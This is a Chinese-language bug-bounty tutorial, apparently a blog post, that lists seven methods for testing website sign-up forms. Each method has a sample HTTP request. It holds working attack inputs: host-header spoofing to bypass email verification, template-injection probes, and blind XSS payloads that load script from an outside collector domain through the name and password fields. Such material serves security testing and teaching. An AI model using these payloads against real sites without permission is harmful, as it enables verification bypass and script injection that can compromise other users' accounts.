赏金猎人系列-如何测试注册(Sign up)功能(III)以及相关Tips

声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任。

正文

本文为本系列的第三篇,继续梳理注册功能中可能存在漏洞的测试流程与方法,前面写的系列文章有:

注册功能测试小结

赏金猎人系列-如何测试注册(Sign up)功能

赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips

第十五种方法

尝试用公司邮箱地址来注册，例如[email protected]，然后尝试访问公司的所有接口，而无需验证[email protected]

 
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Referer: https://previous.com/path
Origin: https://www.company.com 
Content-Length: Number
firstname=I&lastname=am&[email protected]&pas sword=*****&captcha=Random&token=CSRF

第十六种方法

如果[email protected]作为电子邮件地址通过了，但是不能激活，可以尝试欺骗主机头，例如x-forward-Host或X-Host

 
POST /signUp HTTP/1.1
Host: www.company.com
X-Forwarded-Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Origin: https://www.company.com 
Content-Length: Number
firstname=I&lastname=am&[email protected]&password= ********&captcha=Random&token=CSRF

第十七种方法

尝试在用户名中插入SSTI的payload,比如: {{7*7}} , {7*7}或者${7*7}

 
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Referer: https://previous.com/path
Origin: https://www.company.com 
Content-Length: Number
firstname={{7*7}}&lastname={{7*7}}&username={{7*7}} &email=me&password=*****&captcha=Random&token=CSRF

第十八种方法

尝试在用户名中插入<%,如果在邮件正文中发现<%起到作用,尝试注入<%= 7 * 7 %>看看有没ssti漏洞

第十九种方法

尝试在名字中注入盲xss的payload: "><script src=//me.xss.ht></script>,查看一下有没有Blind xss

 
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Content-Length: Number
firstname="><script src=//me.xss.ht></script> 
&lastname="><script src=//me.xss.ht></script>&
[email protected]&password=**************&captcha=Random &token=CSRF

第二十种方法

尝试在名字中注入盲xss的payload: <img src="//me.xss.ht">,查看一下有无Blind xss

 
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Content-Length: Number
firstname=<img src="//me.xss.ht"> 
&lastname=<img src="//me.xss.ht">&
[email protected]&password=**************&captcha=Random &token=CSRF

第二十一种方法

在设置密码时尝试注入盲xss的payload:"><script src=//me.xss.ht></script>

 
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Referer: https://previous.com/path
Origin: https://www.company.com 
Content-Length: Number
firstname=I&lastname=am&email=me&password="><script src=//me.xss.ht></script>&captcha=Random&token=CSRF

参考

https://rohitcoder.medium.com/facebook-workplace-bug-exposed-offsite-employee-events-sensitive-emails-putting-employees-at-risk-813d77a0c0ab

https://gauravnarwani.com/injecting-6200-to-1200/

https://verneet.com/fuzzing-77-till-p1/

https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html

https://hackerone.com/reports/423541

https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870

https://hackerone.com/reports/251224

https://twitter.com/intigriti/status/1072181482028978177

https://hackerone.com/reports/7995

了解更多的技术与学习视频教程可以关注公众号。

github.com/hiadragon